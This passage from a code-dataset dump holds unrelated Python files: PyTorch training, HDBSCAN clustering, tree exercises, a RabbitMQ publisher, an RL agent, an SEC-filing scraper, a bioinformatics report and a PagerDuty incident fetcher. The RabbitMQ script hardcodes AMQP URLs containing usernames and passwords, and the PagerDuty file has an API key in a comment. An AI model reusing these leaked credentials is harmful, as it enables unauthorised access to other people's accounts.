#torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optim,patience=1)\n\n # (x1,x2,labels,masks) = next(iter(valid_dataloader))\n # out = model(x1,x2,masks)\n # ipdb.set_trace()\n # print(f\"Starting Learning Rate : {scheduler._last_lr}\")\n best_f1 = 0\n for epoch in range(config['train']['epochs']):\n avg_train_loss = 0\n for batch,(x1,x2,labels,masks) in tqdm(enumerate(train_dataloader),desc=f\"Training Epoch {epoch+1}\",total=len(train_dataloader)):\n x1 = x1.to(device)\n x2 = x2.to(device)\n masks = masks.to(device)\n labels = labels.to(device)\n # ipdb.set_trace()\n y_pred = model(x1,x2,masks)\n train_loss = loss(y_pred,labels)\n optim.zero_grad()\n train_loss.backward()\n optim.step()\n avg_train_loss += train_loss.item()\n # y_pred[y_pred>0.5] = 1\n # y_pred[y_pred<=0.5] = 0\n if (batch+1)%300 == 0:\n print(f\"Batch No. {batch+1} the average train loss {avg_train_loss/(batch+1)}\")\n\n binary_id = torch.argmax(y_pred,dim=1).to('cpu')\n ground_truth = torch.argmax(labels,dim=1).to('cpu')\n # ipdb.set_trace()\n metric.update(binary_id,ground_truth)\n precision.update(binary_id,ground_truth)\n recall.update(binary_id,ground_truth)\n scheduler.step(epoch*len(train_dataloader)+batch)\n\n\n train_f1 = metric.compute()\n train_recall = recall.compute()\n train_precision = precision.compute()\n train_loss = avg_train_loss/len(train_dataloader)\n\n print(f\"Average Train Loss {train_loss}\")\n print(f\"F1 train : {train_f1}\")\n print(f\"Precision train : {train_precision}\")\n print(f\"Recall train : {train_recall}\")\n\n metric.reset()\n precision.reset()\n recall.reset()\n\n with torch.no_grad():\n val_loss = 0\n for batch,(x1,x2,labels,masks) in tqdm(enumerate(valid_dataloader),desc=f\"Validation Epoch {epoch+1}\",total=len(valid_dataloader)):\n x1 = x1.to(device)\n x2 = x2.to(device)\n masks = masks.to(device)\n labels = labels.to(device)\n y_pred = model(x1,x2,masks)\n val_loss += loss(y_pred,labels).item()\n\n binary_id = torch.argmax(y_pred,dim=1).to('cpu')\n ground_truth = torch.argmax(labels,dim=1).to('cpu')\n metric.update(binary_id,ground_truth)\n precision.update(binary_id,ground_truth)\n recall.update(binary_id,ground_truth)\n\n valid_f1 = metric.compute()\n valid_recall = recall.compute()\n valid_precision = precision.compute()\n valid_loss = val_loss/len(valid_dataloader)\n \n print(f\"Average Validation Loss {val_loss/len(valid_dataloader)}\")\n print(f\"F1 Validation: {valid_f1}\")\n print(f\"Precision Validation : {valid_precision}\")\n print(f\"Recall Validation : {valid_recall}\")\n\n if best_f1 --min_samples= --cluster_selection_epsilons= --cluster_selection_methods=\n\n Keyword arguments:\n savefile: path to save the metadata and diagnostics \n inpath: path to feather data containing a labeled matrix of subreddit similarities.\n outpath: path to output fit kmeans clusterings.\n min_cluster_sizes: one or more integers indicating the minimum cluster size\n min_samples: one or more integers indicating the minimum number of samples used in the algorithm\n cluster_selection_epsilon: one or more similarity thresholds for transition from dbscan to hdbscan\n cluster_selection_method: \"eom\" or \"leaf\"; eom gives larger clusters. 
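\n\n Example (illustrative invocation; file names and values are hypothetical):\n $ python3 hdbscan_clustering.py --savefile=grid.csv --inpath=sims.feather --outpath=clusters --min_cluster_sizes=2 --min_samples=5 --cluster_selection_epsilons=0.0 --cluster_selection_methods=eom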
\n \"\"\" \n obj = hdbscan_grid_sweep(inpath,\n outpath,\n map(int,min_cluster_sizes),\n map(int,min_samples),\n map(float,cluster_selection_epsilons),\n cluster_selection_methods)\n obj.run()\n obj.save(savefile)\n\ndef KNN_distances_plot(mat,outname,k=2):\n nbrs = NearestNeighbors(n_neighbors=k,algorithm='auto',metric='precomputed').fit(mat)\n distances, indices = nbrs.kneighbors(mat)\n d2 = distances[:,-1]\n df = pd.DataFrame({'dist':d2})\n df = df.sort_values(\"dist\",ascending=False)\n df['idx'] = np.arange(0,d2.shape[0]) + 1\n p = pn.qplot(x='idx',y='dist',data=df,geom='line') + pn.scales.scale_y_continuous(minor_breaks = np.arange(0,50)/50,\n breaks = np.arange(0,10)/10)\n p.save(outname,width=16,height=10)\n \ndef make_KNN_plots():\n similarities = \"/gscratch/comdata/output/reddit_similarity/subreddit_comment_terms_10k.feather\"\n subreddits, mat = read_similarity_mat(similarities)\n mat = sim_to_dist(mat)\n\n KNN_distances_plot(mat,k=2,outname='terms_knn_dist2.png')\n\n similarities = \"/gscratch/comdata/output/reddit_similarity/subreddit_comment_authors_10k.feather\"\n subreddits, mat = read_similarity_mat(similarities)\n mat = sim_to_dist(mat)\n KNN_distances_plot(mat,k=2,outname='authors_knn_dist2.png')\n\n similarities = \"/gscratch/comdata/output/reddit_similarity/subreddit_comment_authors-tf_10k.feather\"\n subreddits, mat = read_similarity_mat(similarities)\n mat = sim_to_dist(mat)\n KNN_distances_plot(mat,k=2,outname='authors-tf_knn_dist2.png')\n\nif __name__ == \"__main__\":\n fire.Fire(run_hdbscan_grid_sweep)\n \n","repo_name":"groceryheist/cdsc_reddit","sub_path":"clustering/hdbscan_clustering.py","file_name":"hdbscan_clustering.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25698997669","text":"# bare node class, without a Tree wrapper\r\nclass BTNode():\r\n def __init__(self, data, left=None, right=None):\r\n self.data, self.left, self.right = data, left, right\r\n\r\n def longest_path(self):\r\n \"\"\" BTNode -> list of BTNode\"\"\"\r\n## this base case is already covered by the code below\r\n## if self.left == self.right == None:\r\n## return [self]\r\n\r\n if self.left:\r\n l = self.left.longest_path()\r\n else:\r\n l = [] #base case\r\n\r\n if self.right:\r\n r = self.right.longest_path()\r\n else:\r\n r = [] #base case\r\n\r\n if len(l) > len(r):\r\n l.append(self)# remember to append the node itself!\r\n return l\r\n else:\r\n r.append(self)\r\n return r\r\n\r\n def all_longest_paths(self):\r\n \"\"\" BTNode -> list of list of BTNode\r\n If there are several longest paths of the same length, return a list of lists of the paths\"\"\"\r\n\r\n if self.left:\r\n l = self.left.all_longest_paths()\r\n else:\r\n l = []\r\n\r\n if self.right:\r\n r = self.right.all_longest_paths()# at this point this is already one big list holding many longest paths\r\n else:\r\n r = [] \r\n\r\n # only consider the current level: l and r now each hold all the longest paths of their subtree\r\n if l == []:\r\n longest = r \r\n elif r == []:\r\n longest = l\r\n elif len(l[0]) > len(r[0]):# the longest paths all have equal length, so comparing the first path of each list is enough\r\n longest = l\r\n elif len(l[0]) < len(r[0]):\r\n longest = r\r\n else:# the longest paths in l and r have equal length\r\n longest = l + r\r\n\r\n if longest == []:\r\n return [[self]]# neither subtree has a path; this node is the whole tree\r\n \r\n for a_path in longest:# every individual path in the big list\r\n a_path.append(self)# always append the node itself at the end\r\n\r\n return longest\r\n\r\n\r\n def shortest_path(self):# pretty much the same as the longest one\r\n pass\r\n\r\n\r\n def all_data_in_level(self, level):\r\n \"\"\" (BTNode, int) -> list of BTNode\r\n \"\"\"\r\n if level == 0:\r\n return [self]\r\n\r\n if self.left:\r\n l = 
self.left.all_data_in_level(level-1)# one level lower once the root is excluded\r\n else:\r\n l = []\r\n\r\n if self.right:\r\n r = self.right.all_data_in_level(level-1)\r\n else:\r\n r = []\r\n\r\n return l + r\r\n\r\nt = BTNode(1,BTNode(2,BTNode(4,BTNode(8),BTNode(9)),BTNode(5,None,BTNode(10))),BTNode(3,BTNode(6),BTNode(7)))","repo_name":"xxcocoymlxx/Study-Notes","sub_path":"CSC148/06 Tree(BST)/more tree practice.py","file_name":"more tree practice.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4465337523","text":"import pika\nimport json\n#host='amqps://hcdfnopi:QrnJs_rKX_kGxmgMFHoSevUTgrsqIPuh@roedeer.rmq.cloudamqp.com/hcdfnopi'\nhost='amqps://ppapnglh:anS8VpRjtAenIzJqaRN6MYLTBoiH16zm@whale.rmq.cloudamqp.com/ppapnglh'\n\n# url = os.environ.get('CLOUDAMQP_URL', 'amqp://guest:guest@localhost:5672/%2f')amqps://hcdfnopi:QrnJs_rKX_kGxmgMFHoSevUTgrsqIPuh@roedeer.rmq.cloudamqp.com/hcdfnopi\n\n# params = pika.URLParameters(url)\nconnection = pika.BlockingConnection(\n\npika.URLParameters(host)\n)\nchannel = connection.channel()\nchannel.queue_declare(queue='test1')\n# NOTE: the queue 'test1' is declared, but the message below is published with routing_key='hello'\ndict1={\"ID\": 338719585, \"Account\": \"DUC00074\", \"Symbol\": \"EAGG\", \"SecurityType\": \"STK\", \"Position\": 1280.0, \"Amount\": 53.3022901, \"Currency\": \"USD\"}\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body=json.dumps(dict1))\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()\n#pika.ConnectionParameters(host)\n# pika.URLParameter(host)\n","repo_name":"chiefexb/tws_script","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14923091816","text":"from __future__ import print_function\nfrom builtins import zip\nfrom builtins import range\nfrom builtins import object\n# Copyright 2018 The TensorFlow Authors All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport numpy as np\nimport tensorflow as tf\nimport time, os, traceback, multiprocessing, portalocker\n\nimport envwrap\nimport valuerl\nimport util\nfrom config import config\n\n\ndef run_env(pipe):\n env = envwrap.get_env(config[\"env\"][\"name\"])\n reset = True\n while True:\n if reset is True: pipe.send(env.reset())\n action = pipe.recv()\n obs, reward, done, reset = env.step(action)\n pipe.send((obs, reward, done, reset))\n\nclass AgentManager(object):\n \"\"\"\n Interact with the environment according to the learned policy.\n \"\"\"\n def __init__(self, proc_num, evaluation, policy_lock, batch_size, config):\n self.evaluation = evaluation\n self.policy_lock = policy_lock\n self.batch_size = batch_size\n self.config = config\n\n self.log_path = util.create_directory(\"%s/%s/%s/%s\" % (config[\"output_root\"], config[\"env\"][\"name\"], config[\"name\"], config[\"log_path\"])) + \"/%s\" % config[\"name\"]\n 
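# load_path points at the saved policy checkpoints (written elsewhere,\n # presumably by the learner process); reload() below loads the newest\n # params from it while holding policy_lock.\n 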
self.load_path = util.create_directory(\"%s/%s/%s/%s\" % (config[\"output_root\"], config[\"env\"][\"name\"], config[\"name\"], config[\"save_model_path\"]))\n\n ## placeholders for intermediate states (basis for rollout)\n self.obs_loader = tf.placeholder(tf.float32, [self.batch_size, np.prod(self.config[\"env\"][\"obs_dims\"])])\n\n ## build model\n self.valuerl = valuerl.ValueRL(self.config[\"name\"], self.config[\"env\"], self.config[\"policy_config\"])\n self.policy_actions = self.valuerl.build_evalution_graph(self.obs_loader, mode=\"exploit\" if self.evaluation else \"explore\")\n\n # interactors\n self.agent_pipes, self.agent_child_pipes = list(zip(*[multiprocessing.Pipe() for _ in range(self.batch_size)]))\n self.agents = [multiprocessing.Process(target=run_env, args=(self.agent_child_pipes[i],)) for i in range(self.batch_size)]\n for agent in self.agents: agent.start()\n self.obs = [pipe.recv() for pipe in self.agent_pipes]\n self.total_rewards = [0. for _ in self.agent_pipes]\n self.loaded_policy = False\n\n self.sess = tf.Session()\n self.sess.run(tf.global_variables_initializer())\n\n self.rollout_i = 0\n self.proc_num = proc_num\n self.epoch = -1\n self.frame_total = 0\n self.hours = 0.\n\n self.first = True\n\n def get_action(self, obs):\n if self.loaded_policy:\n all_actions = self.sess.run(self.policy_actions, feed_dict={self.obs_loader: obs})\n all_actions = np.clip(all_actions, -1., 1.)\n return all_actions[:self.batch_size]\n else:\n return [self.get_random_action() for _ in range(obs.shape[0])]\n\n def get_random_action(self, *args, **kwargs):\n return np.random.random(self.config[\"env\"][\"action_dim\"]) * 2 - 1\n\n def step(self):\n actions = self.get_action(np.stack(self.obs))\n self.first = False\n [pipe.send(action) for pipe, action in zip(self.agent_pipes, actions)]\n next_obs, rewards, dones, resets = list(zip(*[pipe.recv() for pipe in self.agent_pipes]))\n\n frames = list(zip(self.obs, next_obs, actions, rewards, dones))\n\n self.obs = [o if resets[i] is False else self.agent_pipes[i].recv() for i, o in enumerate(next_obs)]\n\n for i, (t,r,reset) in enumerate(zip(self.total_rewards, rewards, resets)):\n if reset:\n self.total_rewards[i] = 0.\n if self.evaluation and self.loaded_policy:\n with portalocker.Lock(self.log_path+'.greedy.csv', mode=\"a\") as f: f.write(\"%2f,%d,%d,%2f\\n\" % (self.hours, self.epoch, self.frame_total, t+r))\n\n else:\n self.total_rewards[i] = t + r\n\n if self.evaluation and np.any(resets): self.reload()\n\n self.rollout_i += 1\n return frames\n\n def reload(self):\n if not os.path.exists(\"%s/%s.params.index\" % (self.load_path ,self.valuerl.saveid)): return False\n with self.policy_lock:\n self.valuerl.load(self.sess, self.load_path)\n self.epoch, self.frame_total, self.hours = self.sess.run([self.valuerl.epoch_n, self.valuerl.frame_n, self.valuerl.hours])\n self.loaded_policy = True\n self.first = True\n return True\n\ndef main(proc_num, evaluation, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config):\n try:\n np.random.seed((proc_num * int(time.time())) % (2 ** 32 - 1))\n agentmanager = AgentManager(proc_num, evaluation, policy_lock, config[\"evaluator_config\"][\"batch_size\"] if evaluation else config[\"agent_config\"][\"batch_size\"], config)\n frame_i = 0\n while True:\n new_frames = agentmanager.step()\n if not evaluation:\n policy_replay_frame_queue.put(new_frames)\n if model_replay_frame_queue is not None: model_replay_frame_queue.put(new_frames)\n if frame_i % 
config[\"agent_config\"][\"reload_every_n\"] == 0: agentmanager.reload()\n frame_i += len(new_frames)\n\n except Exception as e:\n print('Caught exception in agent process %d' % proc_num)\n traceback.print_exc()\n print()\n try:\n for i in agentmanager.agents: i.join()\n except:\n pass\n raise e\n","repo_name":"yitu-opensource/MobileNeXt","sub_path":"mobile_deployment/tensorflow/slim/models/research/steve/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"77"} +{"seq_id":"71873076408","text":"import requests\nimport sentry_sdk\nfrom celery import Celery\nfrom bs4 import BeautifulSoup\nfrom dateutil.parser import parse\nfrom helpers.forms import FORMS\nfrom helpers.sec_utils import *\nfrom helpers.github_json import check_github_json\nload_dotenv()\n\napp = Celery('tasks')\napp.conf.timezone = 'UTC'\napp.conf.broker_pool_limit = 1\napp.conf.broker_url = os.getenv('CLOUDAMQP_URL')\napp.conf.beat_schedule = {\n 'scrape-every-10-seconds': {\n 'task': 'main.get_filing',\n 'schedule': 10.0\n },\n}\nsentry_sdk.init(os.getenv('SENTRY_DSN'))\n\n@app.task\ndef get_filing():\n\tSEC_URL = \"https://www.sec.gov/cgi-bin/browse-edgar?action=getcurrent&CIK=&type=&company=&dateb=&owner=include&start=0&count=40&output=atom\"\n\tTSLA_CIK = \"0001318605\"\n\t# DUMMY_CIK = \"0001048477\"\n\tuser_agent = \"RoboStox hellorobostox@gmail.com\"\n\theaders = {'User-agent': user_agent}\n\ttry:\n\t\tresponse = requests.get(SEC_URL, headers=headers)\n\t\tif response.status_code != 200:\n\t\t\traise Exception(f\"Status Code Error: {response.status_code}\")\n\t\tsoup = BeautifulSoup(response.content, \"xml\")\t\t\n\t\tfilings = soup.findAll('entry')\n\t\tfor f in filings:\n\t\t\ttitle = f.title.text\n\t\t\tform_type = f.category.get(\"term\")\n\t\t\tapi_date = f.updated.text\n\t\t\tpython_date = parse(api_date)\n\t\t\tpretty_time = python_date.strftime(\"%I:%M%p\")\n\t\t\tcik, filing_entity = circle_brackets_data(title)\t\t\n\t\t\tfiling = {\n\t\t\t\t\"company_name\": get_company_name(title),\t\t\t\t\t\n\t\t\t\t\"filing_link\": f.link.get(\"href\"),\n\t\t\t\t\"form_type\": form_type,\n\t\t\t\t\"pretty_time\": pretty_time,\n\t\t\t\t\"raw_datetime\": api_date,\n\t\t\t\t\"form_explanation\": generate_form_explanation(form_type),\n\t\t\t\t\"cik_code\": cik\n\t\t\t}\n\t\t\tif filing_entity != \"Reporting\":\n\t\t\t\tif cik == TSLA_CIK and form_type in FORMS.keys():\n\t\t\t\t\tcheck_github_json(filing)\n\t\t\t\telse:\t\t\t\t\t\t\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcontinue\n\texcept Exception as e:\n\t\tsentry_sdk.capture_exception(e)\n\n# if __name__ == \"__main__\":\n# \tget_filing()","repo_name":"daneasterman/robostox-twitter-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4350641261","text":"import numpy as np\nfrom .enumerations import INNER, MID3D, OUTER\n\nMETA_HALO_VALID = 0\nMETA_N_OUTER = 1\nMETA_N_MID3D = 2\nMETA_N_INNER = 3\nMETA_SIZE = 4\n\n\ndef make_meta(halo_valid: bool, grid):\n meta = np.empty(META_SIZE, dtype=int)\n meta[META_HALO_VALID] = halo_valid\n meta[META_N_OUTER] = grid[OUTER] if len(grid) > 1 else 0\n meta[META_N_MID3D] = grid[MID3D] if len(grid) > 2 else 0\n meta[META_N_INNER] = grid[INNER]\n return 
meta\n","repo_name":"piotrbartman/PyMPDATA-old","sub_path":"PyMPDATA/arakawa_c/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5375663119","text":"'''\nLet the three subjects be Maths, Physics and Computers\nwith Max marks equal to 100\n'''\nwhile True:\n try:\n maths=int(input(\"Enter the marks in Maths: \"))\n physics=int(input(\"Enter the marks in Physics: \"))\n computers=int(input(\"Enter the marks in Computers: \"))\n if(maths>100 or physics>100 or computers>100):\n raise ValueError\n elif(maths<0 or physics<0 or computers<0):\n raise ArithmeticError\n else:\n break\n except ValueError:\n print(\"Marks cannot be greater than 100!\")\n except ArithmeticError:\n print(\"Marks cannot be less than 0!\")\nprint(f\"The percentage scored is {(maths+physics+computers)/3}\")","repo_name":"chaitanya-bhargava/Sem-1-C-Programming-File","sub_path":"python3.py","file_name":"python3.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73805447928","text":"import sys\nimport os\nfrom os.path import join\nimport csv\n\nfrom collections import Counter, namedtuple\n\n# BlobSample = namedtuple(\"BlobSample\", \"sample ncontigs dom_org dom_org_ncontigs dom_org_perc dom_org_span subdom_org subdom_org_ncontigs subdom_org_perc subdom_org_span\".split(\" \"))\n\nBlobSampleFields = \"sample size ncontigs\" + \\\n \" Pgbp Pgbp_size Pgbp_size_pc Pgbp_ctg Pgbp_ctg_pc\" + \\\n \" Pgct Pgct_size Pgct_size_pc Pgct_ctg Pgct_ctg_pc\" + \\\n \" Sgbp Sgbp_size Sgbp_size_pc Sgbp_ctg Sgbp_ctg_pc\" + \\\n \" Sgct Sgct_size Sgct_size_pc Sgct_ctg Sgct_ctg_pc\"\n\nBlobSample = namedtuple(\"BlobSample\", BlobSampleFields.split(\" \"))\n\nHEADER = [\n \"Sample\", \"Assembly size [bp] (asmsize)\", \"#Contigs\",\n \"Predominant genus by size (Pgbp)\", \"Size (Pgbp) [bp]\", \"Size (Pgbp) / asmsize\", \"#Contigs (Pgbp)\", \"#Contigs (Pgbp) / #Contigs\",\n \"Predominant genus by contig (Pgct)\", \"Size (Pgct) [bp]\", \"Size (Pgct) / asmsize\", \"#Contigs (Pgct)\", \"#Contigs (Pgct) / #Contigs\",\n \"Subdominant genus by size (Sgbp)\", \"Size (Sgbp) [bp]\", \"Size (Sgbp) / asmsize\", \"#Contigs (Sgbp)\", \"#Contigs (Sgbp) / #Contigs\",\n \"Subdominant genus by contig (Sgct)\", \"Size (Sgct) [bp]\", \"Size (Sgct) / asmsize\", \"#Contigs (Sgct)\", \"#Contigs (Sgct) / #Contigs\",\n ]\n\ndef compileBlobReport(blob_dir, out=sys.stdout):\n print(\"Running BLOBREPORT... 
\" + blob_dir)\n print(*HEADER, sep=\"\\t\", file=out)\n for cdir, dirs, files in os.walk(blob_dir):\n blobtable = list(filter(lambda s:s.endswith(\".blobDB.table.txt\"), files))\n if blobtable:\n sample = blobtable[0].split(\".\")[0]\n taxcounter, spancounter, taxmap = Counter(), Counter(), dict()\n # # name length GC N bam0 family.t.6 family.s.7 family.c.8\n # 1 193272 0.5448 0 172.984 Lactobacillaceae 15529.0 0\n with open(join(cdir, blobtable[0])) as tin:\n for row in csv.reader(tin, delimiter=\"\\t\"):\n if not row[0].startswith(\"#\"):\n genus = row[5].split(\" \")[0]\n taxcounter[genus] += 1\n spancounter[genus] += int(row[1])\n taxmap.setdefault(genus, Counter())[row[5]] += 1\n \n ncontigs, totalsize = sum(taxcounter.values()), sum(spancounter.values())\n orgs_by_size = sorted(spancounter.items(), key=lambda x:x[1], reverse=True)\n orgs_by_nctg = sorted(taxcounter.items(), key=lambda x:x[1], reverse=True)\n pdomorg_by_size = orgs_by_size.pop(0)\n try:\n sdomorg_by_size = orgs_by_size.pop(0)\n except:\n sdomorg_by_size = (None, 0)\n pdomorg_by_nctg = orgs_by_nctg.pop(0)\n try:\n sdomorg_by_nctg = orgs_by_nctg.pop(0)\n except:\n sdomorg_by_nctg = (None, 0)\n blob_data = BlobSample(sample, \n totalsize,\n ncontigs,\n pdomorg_by_size[0], \n spancounter[pdomorg_by_size[0]],\n spancounter[pdomorg_by_size[0]] / totalsize if totalsize else None,\n taxcounter[pdomorg_by_size[0]], \n taxcounter[pdomorg_by_size[0]] / ncontigs if ncontigs else None,\n pdomorg_by_nctg[0],\n spancounter[pdomorg_by_nctg[0]],\n spancounter[pdomorg_by_nctg[0]] / totalsize if totalsize else None,\n taxcounter[pdomorg_by_nctg[0]], \n taxcounter[pdomorg_by_nctg[0]] / ncontigs if ncontigs else None,\n sdomorg_by_size[0] if sdomorg_by_size[0] is not None else \"NA\", \n spancounter[sdomorg_by_size[0]],\n spancounter[sdomorg_by_size[0]] / totalsize if totalsize else None,\n taxcounter[sdomorg_by_size[0]], \n taxcounter[sdomorg_by_size[0]] / ncontigs if ncontigs else None,\n sdomorg_by_nctg[0] if sdomorg_by_nctg[0] is not None else \"NA\",\n spancounter[sdomorg_by_nctg[0]],\n spancounter[sdomorg_by_nctg[0]] / totalsize if totalsize else None,\n taxcounter[sdomorg_by_nctg[0]], \n taxcounter[sdomorg_by_nctg[0]] / ncontigs if ncontigs else None)\n\n print(*blob_data, sep=\"\\t\", file=out)\n","repo_name":"EI-CoreBioinformatics/qaa","sub_path":"qaa/reporting/blobtools_report.py","file_name":"blobtools_report.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25716307817","text":"import pandas as pd\nfrom tqdm import tqdm\nfrom gensim import corpora,similarities,models\nimport pandas as pd\nimport pickle\nfrom util import pre_process\nimport os\n\npath_temp = '../final_data/'\n\npapers = pd.read_csv('../data/candidate_paper.csv')\npapers=papers[papers['paper_id'].notnull()]\npapers['abstract'] = papers['abstract'].fillna('none')\npapers['title'] = papers['title'].fillna('none')\npapers['keywords'] = papers['keywords'].fillna('none')\n\n\ntrain=papers['title'].values+' '+papers['abstract'].values+' '+papers['keywords'].apply(lambda x: x.replace(';',' ')).values\ntrain_item_id=list(papers['paper_id'].values)\n\nwith open(path_temp+'paper_id.pkl', 'wb') as fw:\n pickle.dump(train_item_id,fw)\n\n\nif not os.path.exists(path_temp+'train_content.pkl'):\n with open(path_temp+'train_content.pkl','wb') as fw:\n train = list(map(lambda x: pre_process(x), tqdm(train)))\n pickle.dump(train,fw)\nelse:\n with 
open(path_temp+'train_content.pkl','rb') as fr:\n train = pickle.load(fr)\n\n\ndictionary = corpora.Dictionary(train)\ncorpus = [dictionary.doc2bow(text) for text in train]\n\n# corpus is an iterator that yields BoW vectors. The code below computes the IDF value for every feature that appears in corpus\ntfidf_model = models.TfidfModel(corpus, dictionary=dictionary)\ncorpus_tfidf = tfidf_model[corpus]\n\ndictionary.save(path_temp+'train_dictionary.dict') # save the generated dictionary\ntfidf_model.save(path_temp+'train_tfidf.model')\ncorpora.MmCorpus.serialize(path_temp+'train_corpuse.mm', corpus)\nfeaturenum = len(dictionary.token2id.keys()) # get the number of features via token2id\n# sparse-matrix similarity: build the index by initializing a similarity object with the document vectors to be searched\nindex = similarities.SparseMatrixSimilarity(corpus_tfidf, num_features=featurenum) # this is the document index\nindex.save(path_temp+'train_index.index')\n","repo_name":"myeclipse/wsdm_cup_2020_solution","sub_path":"preprocess/step2:prepare_recall.py","file_name":"step2:prepare_recall.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"77"} +{"seq_id":"14212867145","text":"from time import time, gmtime, strftime\n\nfrom pdpyras import APISession\n\n\ndef incident_iter_selected(api_key, duration, service_ids, integrations, all_tags):\n api_session = APISession(api_key)\n durations = {\"0\": 30, \"1\": 60, \"2\": 90, \"3\": 120, \"4\": 150, \"5\": 180, \"6\": 210, \"7\": 240, \"8\": 270, \"9\": 300,\n \"10\": 330, \"11\": 360, \"12\": 440, \"13\": 720, \"14\": 900, \"15\": 1080}\n incidents = get_incidents(durations[duration], api_session, service_ids, integrations, all_tags)\n print(\"Found %s incident(s) for Service %s for %s months with integration: %s\" % (\\\n str(len(incidents)), service_ids[0], str(int(duration) + 1), integrations))\n\n return incidents\n\n\ndef get_incidents(duration, api_session, service_ids, integrations, all_tags):\n incidents = []\n for i in range(30, duration + 30, 30):\n disco_param = discovery_params(i, service_ids)\n temp_incidents = iter_incidents(api_session, disco_param, integrations, all_tags)\n incidents = incidents + temp_incidents\n\n return incidents\n\n\ndef discovery_params(i, services):\n current_window = i + 5 if i == 360 else i\n time_today = int(time()) - ((i - 30) * 24 * 60 * 60)\n time_to = int(time()) - (current_window * 24 * 60 * 60)\n\n discover_from = strftime('%Y-%m-%dT%H:%M:%S-00', gmtime(time_today))\n discover_to = strftime('%Y-%m-%dT%H:%M:%S-00', gmtime(time_to))\n\n window_param = {'since': discover_to, 'until': discover_from, 'service_ids[]': [services], 'time_zone': 'UTC',\n 'include[]': ['first_trigger_log_entries']}\n return window_param\n\n\ndef iter_incidents(api_session, window_param, integrations, all_tags):\n all_incidents = []\n ignored = []\n\n count = 0\n\n # Making PagerDuty API calls for Incidents in this section\n for current_incident in api_session.iter_all('incidents', params=window_param, paginate=True):\n temp_incident = current_incident\n alerts = api_session.rget('incidents/%s/alerts' % current_incident['id'])\n try:\n temp_incident[\"all_alerts\"] = alerts[\"alerts\"]\n except TypeError:\n temp_incident[\"all_alerts\"] = alerts\n if \"[REDACTED] by\" in current_incident['description']:\n continue\n\n ftle_channel = current_incident[\"first_trigger_log_entry\"][\"channel\"]\n # print('--------\\n',integrations)\n # print(ftle_channel['details'], '\\n')\n if integrations.lower() == 'datadog' and 'tags' in ftle_channel['details']:\n tags = current_incident[\"first_trigger_log_entry\"][\"channel\"][\"details\"][\"tags\"]\n elif integrations.lower() 
== 'dynatrace' and 'Tags' in ftle_channel['details']:\n tags = current_incident[\"first_trigger_log_entry\"][\"channel\"][\"details\"][\"Tags\"]\n elif integrations.lower() == 'nagios' and 'host' in ftle_channel:\n tags = 'hostname:' + current_incident[\"first_trigger_log_entry\"][\"channel\"][\"host\"]\n elif integrations.lower() == 'checkmk' and 'host' in ftle_channel:\n tags = current_incident[\"first_trigger_log_entry\"][\"channel\"][\"host\"]\n else:\n tags = \"\"\n if tags:\n extract_tags(tags, all_tags)\n\n temp_incident[\"tags\"] = tags\n temp_incident[\"integration\"] = integrations\n all_incidents.append(temp_incident)\n return all_incidents\n\n\ndef extract_tags(current_tags, all_tags):\n first_layer_tags = current_tags.split(\",\")\n\n if \"untagged\" not in all_tags:\n all_tags[\"untagged\"] = []\n\n for tag in first_layer_tags:\n tag_extract = tag.strip().replace(\" \", \"_\").split(\":\")\n\n if len(tag_extract) == 1 and tag_extract[0] not in all_tags[\"untagged\"]:\n all_tags[\"untagged\"].append(tag_extract[0])\n elif len(tag_extract) == 2:\n if tag_extract[0] not in all_tags:\n all_tags[tag_extract[0]] = [tag_extract[1]]\n elif tag_extract[1] not in all_tags[tag_extract[0]]:\n all_tags[tag_extract[0]].append(tag_extract[1])\n elif len(tag_extract) == 3:\n if tag_extract[0] not in all_tags:\n all_tags[tag_extract[0]] = [tag_extract[1] + tag_extract[2]]\n elif tag_extract[1] + tag_extract[2] not in all_tags[tag_extract[0]]:\n all_tags[tag_extract[0]].append(tag_extract[1] + tag_extract[2])\n\n\n\n# api_key = \"ozhUyFftDxYFTR2rsVWQ\"\n# service_ids = ['PG8L64X', 'PYZQ56E']\n# integrations = ['Datadog', 'Dynatrace']\n# durations = ['5', '9', '10']\n# print(\"---GETTING INCIDENTS---\")\n# incidents = []\n# tags = {}\n# for i in range(len(service_ids)):\n# print(\"---Getting incidents for %s in %s month(s)---\" % (service_ids[i], str(int(durations[i]) + 1)))\n# incidents += incident_iter_selected(api_key, durations[i], service_ids[i], integrations[i], tags)\n#\n# print(\"---GOT INCIDENTS---\")\n#\n# count = 1\n# for incident in incidents:\n# print(count, incident)\n# count += 